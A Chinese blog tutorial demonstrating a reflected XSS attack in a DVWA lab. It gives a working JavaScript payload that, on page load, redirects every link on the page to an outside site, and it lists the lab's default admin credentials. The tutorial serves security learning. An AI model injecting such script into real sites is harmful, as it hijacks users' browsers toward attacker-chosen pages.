当前位置:网站首页>XX攻击——反射型 XSS 攻击劫持用户浏览器
XX攻击——反射型 XSS 攻击劫持用户浏览器
2022-07-01 08:06:00 【Cwillchris】
我们先构建一个反射型的 XSS 攻击跳转到存在漏洞的页面。其实也可以在 DVWA 中直接进行攻击,但是我们处于演示目的构造了一个相对复杂的环境。
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
link[j].href="http://www.baidu.com";}
}
</script>
JavaScript 代码分析 window.onload 当网页加载完成时,执行 function 匿名函数
函数功能:document.getElementsByTagName 获取页面中所有的 a 标签,存放到 link 数组中,使用 for 循环将 link 数组中的所有元素替换为恶意网址。
打开 chrome 浏览器,我们在反射型 XSS 中进行测试效果
登录 http://192.168.98.66/DVWA-master/login.php 用户名: admin 密码:password ,改为low级别
边栏推荐
- Chinese font Gan: zi2zi
- [force deduction 10 days SQL introduction] Day9 control flow
- [MySQL learning notes 28] storage function
- What information does the supplier need to know about Audi EDI project?
- [getting started] intercepting strings
- Uni hot update
- 5大组合拳,解决校园6大难题,护航教育信息化建设
- EDA开源仿真工具verilator入门6:调试实例
- 【力扣10天SQL入门】Day10 控制流
- Basic knowledge of MATLAB
猜你喜欢
【入门】提取不重复的整数
Instead of houses, another kind of capital in China is rising
The triode is a great invention
SharePoint - how to quickly check whether SharePoint is standard or enterprise edition?
Wang Yingqi, founder of ones, talks to fortune (Chinese version): is there any excellent software in China?
Principle and process of embossing
Introduction to kubernetes resource objects and common commands (II)
Teach you how to apply for domestic trademark online step by step
Significance and measures of source code encryption
【无标题】
随机推荐
Li Kou daily question - day 31 -1502 Judge whether an arithmetic sequence can be formed
OJ输入输出练习
Php laraver Wechat payment
Serial port oscilloscope software ns-scope
力扣每日一题-第31天-1502.判断能否形成等差数列
Gru of RNN
Aardio - 自己构造的getIconHandle的方法
PHP laravel wechat payment
【mysql学习笔记28】存储函数
Microsoft stream - how to modify video subtitles
Android screen adaptation (using constraintlayout), kotlin array sorting
slice扩容机制分析
Aardio - Shadow Gradient Text
【批处理DOS-CMD命令-汇总和小结】-Cmd窗口中常用操作符(<、<<、&<、>、>>、&>、&、&&、||、|、()、;、@)
How relational databases work
力扣每日一题-第32天-1822.数组元素积的符号
038 network security JS
Implementation and encapsulation of go universal dynamic retry mechanism
[website architecture] solve 90% of distributed transactions in one move, and introduce the working principles and application scenarios of database transactions and distributed transactions
How to troubleshoot SharePoint online map network drive failure?